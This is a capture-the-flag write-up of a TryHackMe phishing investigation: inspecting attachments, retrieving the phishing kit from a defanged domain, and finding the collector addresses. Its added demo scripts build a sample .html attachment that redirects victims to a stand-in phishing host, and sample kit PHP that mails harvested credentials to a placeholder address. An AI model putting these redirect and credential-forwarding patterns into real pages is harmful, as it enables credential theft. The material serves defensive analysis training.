Phishing - Snapped Phish-ing Line

Phishing Email, malicious attachment inspection

By Ren Sie

Refer to Snapped Phish-ing Line for the challenge room on TryHackMe

Scenario

As an IT department personnel at SwiftSpend Financial, one of your responsibilities is to assist employees with their technical concerns. While everything seemed routine, the situation changed when several employees from various departments began reporting an unusual email they had received. Unfortunately, some employees had already submitted their credentials and were unable to log in as a result.

Task

We have now begun investigating the situation by:

  • Analyzing the email samples provided by the colleagues.
  • Examining the phishing URL(s) by browsing them using Firefox.
  • Retrieving the phishing kit used by the adversary.
  • Utilizing CTI-related tools to gather more information about the adversary.
  • Analyzing the phishing kit to collect additional details about the adversary.

Who is the individual who received an email attachment containing a PDF?
By reviewing all available emails, we found four .html attachments and one .pdf attachment.

What email address was used by the adversary to send the phishing emails?
After examining all the emails, we found that all the phishing messages originated from the same email address.

What is the redirection URL to the phishing page for the individual Zoe Duncan?
After opening the email to Zoe, I noticed that there was no URL in the message body, so the link is most likely contained in the attachment. After saving the file to the desktop, we open it with a text editor rather than double-clicking it, since rendering the .html in a browser would follow whatever it points to.

~/Desktop$ gedit <attachment file>

Once we view the source code with the text editor, we know the redirect URL.

Note: When a user opens the .html file, they are instantly redirected to the specified URL, with the email and error parameters supplied by the attachment.

What is the URL to the .zip archive of the phishing kit?
After using the strings and grep commands to search for any 'http' links in the source code, I found an address from the .pdf attachment that matches the one we observed in the .html attachment.

~/Desktop$ strings <attachment> | grep -e 'http'
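The two attachment checks above (reading the redirect target out of the .html and pulling 'http' links out of the .pdf) can be done with a single script that never renders either file. The following is an added example, not code from the original write-up; the attachment contents, the phish.example.test domain and the zoe.duncan@example.test address are constructed placeholders, and the only tools it relies on are grep, sed and sort.

```bash
#!/bin/sh
# Added example, not part of the original write-up: pull link targets out of
# .html and .pdf attachments without rendering them, then defang the results so
# they can be pasted into an incident note.
# All attachment contents below are constructed samples.

EMAIL_VICTIM="zoe.duncan@example.test"   # constructed placeholder address

# Print every http(s) URL in a file, one per line, deduplicated.
# -a treats binary input (PDF streams) as text; -o prints only the match.
# The character class stops at quotes, brackets and ')' so that JS string
# literals and PDF "/URI (...)" entries both terminate cleanly.
extract_urls() {
    grep -aoE 'https?://[^"'"'"'<> )]+' "$1" | sort -u
}

# Defang for notes: http -> hxxp, :// -> [://], every dot -> [.]
defang() {
    sed -e 's#^http#hxxp#' -e 's#://#[://]#' -e 's/\./[.]/g'
}

# Constructed .html attachment in the style described above: it redirects the
# visitor immediately and carries the recipient's address as a parameter.
make_sample_html() {
    cat > "$1" <<EOF
<html><head><script>
var email = "$EMAIL_VICTIM";
window.location.href = "http://phish.example.test/office365/index.php?email=" + email + "&error=1";
</script></head><body></body></html>
EOF
}

# Constructed PDF fragment: link targets live in /URI entries, which is why
# strings | grep 'http' works on real PDFs as well.
make_sample_pdf() {
    printf '%%PDF-1.4\n1 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://phish.example.test/data/Update365.zip) >> >> endobj\n%%%%EOF\n' > "$1"
}

# Summarise each attachment with its defanged URLs.
report() {
    for f in "$@"; do
        echo "== $f"
        extract_urls "$f" | defang
    done
}

# Demo on the constructed samples; nothing is opened in a browser.
workdir=$(mktemp -d)
make_sample_html "$workdir/invoice.html"
make_sample_pdf "$workdir/notice.pdf"
report "$workdir/invoice.html" "$workdir/notice.pdf"
rm -rf "$workdir"
```

Run it as is to see the report on the constructed samples, or call `report` on the real saved attachments; the defanged output is what belongs in the ticket, so nobody clicks the live link by accident.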

Based on the previous screenshot, the link points to a file named "office365." Rather than downloading that file directly, I trimmed the last path components from the URL so we can browse to the "data" directory instead.

Note: Make sure to use http instead of https in the URL.

hxxp[://]kennaroads[.]buzz/data/

After navigating to the address, I found a .zip archive. To obtain the full URL of the archive, right-click on the file and select "Copy link."

What is the SHA256 hash of the phishing kit archive?
To obtain its hash value, first download the archive, then run the sha256sum command on it.

~/Download$ sha256sum <file.zip>

When was the phishing kit archive first submitted?
The "first submitted date" is the date when the file was first uploaded to the community for analysis. We can get it from VirusTotal by searching for the hash value we retrieved in the previous question.

When was the SSL certificate the phishing domain used to host the phishing kit archive first logged?
To learn about the SSL certificate for the domain, we can search for it on crt.sh. The search returns the certificate history logged for the domain, including the earliest certificate.

Note: crt.sh allows users to search and view details of SSL/TLS certificates from Certificate Transparency logs.

What was the email address of the user who submitted their password twice?
While searching for the .zip archive, I came across the log.txt file.

Once I opened the file, I identified the user who submitted their credentials twice.

What was the email address used by the adversary to collect compromised credentials?
To find the email address used to collect the credentials, we need to review the toolkit. Once we unzip the file, we'll navigate to its folder.

We will use the grep command to search the kit for anything that looks like an email address, starting with the ".com" suffix.

~/Downloads/Update365/office365$ grep -rni ".com" *

The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?
We will use the grep command to search for the Gmail address contained in the toolkit.

~/Downloads/Update365/office365$ grep -rni "gmail.com" *
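The log.txt review and the two grep passes over the kit can be folded into one triage script. The following is an added example, not code from the original write-up and not part of the phishing kit: it lists victims who appear in log.txt more than once, then lists every address hard-coded in the kit's own files. The kit layout, the swiftspend.test victim addresses and the exfil-placeholder@example.test / sample-placeholder@gmail.com collector addresses are all constructed placeholders.

```bash
#!/bin/sh
# Added example, not part of the original write-up or the phishing kit: triage
# a downloaded kit directory by (1) listing victims who appear in log.txt more
# than once and (2) listing collector addresses embedded in the kit's source.
# The kit layout and every address below are constructed placeholders.

EMAIL_RE='[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'

# Victims who submitted more than once: extract addresses, count, keep count >= 2.
repeat_submitters() {
    grep -oE "$EMAIL_RE" "$1" | sort | uniq -c | awk '$1 >= 2 { print $2 }'
}

# Addresses embedded in kit source (the victim log is excluded), as file:address.
# Same idea as the grep -rni ".com" pass above, but anchored on an address
# pattern so that domains in URLs or comments do not flood the output.
collector_addresses() {
    find "$1" -type f ! -name 'log.txt' -exec grep -HoE "$EMAIL_RE" {} + | sort -u
}

# Constructed kit: a harvested-credentials log plus two PHP files that
# forward submissions to the operator.
make_sample_kit() {
    mkdir -p "$1/office365"
    cat > "$1/office365/log.txt" <<'EOF'
Email: alice@swiftspend.test | Password: ******** | IP: 203.0.113.5
Email: dana.lee@swiftspend.test | Password: ******** | IP: 198.51.100.7
Email: bob@swiftspend.test | Password: ******** | IP: 203.0.113.9
Email: dana.lee@swiftspend.test | Password: ******** | IP: 198.51.100.7
EOF
    cat > "$1/office365/send.php" <<'EOF'
<?php
// constructed: primary collector address
$recipient = "exfil-placeholder@example.test";
mail($recipient, "Office365 result", $msg);
?>
EOF
    cat > "$1/office365/next.php" <<'EOF'
<?php
// constructed: secondary collector address
$cc = "sample-placeholder@gmail.com";
?>
EOF
}

# Demo on the constructed kit.
kit=$(mktemp -d)
make_sample_kit "$kit"
echo "== users who submitted more than once"
repeat_submitters "$kit/office365/log.txt"
echo "== addresses embedded in the kit"
collector_addresses "$kit"
rm -rf "$kit"
```

On a real kit, point `repeat_submitters` at its log and `collector_addresses` at the unzipped directory; the file:address form tells you at a glance which script forwards the harvested credentials and which address to include in the takedown or abuse report.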

What is the hidden flag?
Based on the provided hint, I will add "flag.txt" to the URL in each directory.

Finally, I found another hint in one of the directories. It mentioned that the value needs to be base64-decoded after being entered into ChatGPT.

My first attempt at decoding revealed that the order of the characters was incorrect, so I used the rev command to reverse it and successfully retrieved the flag.
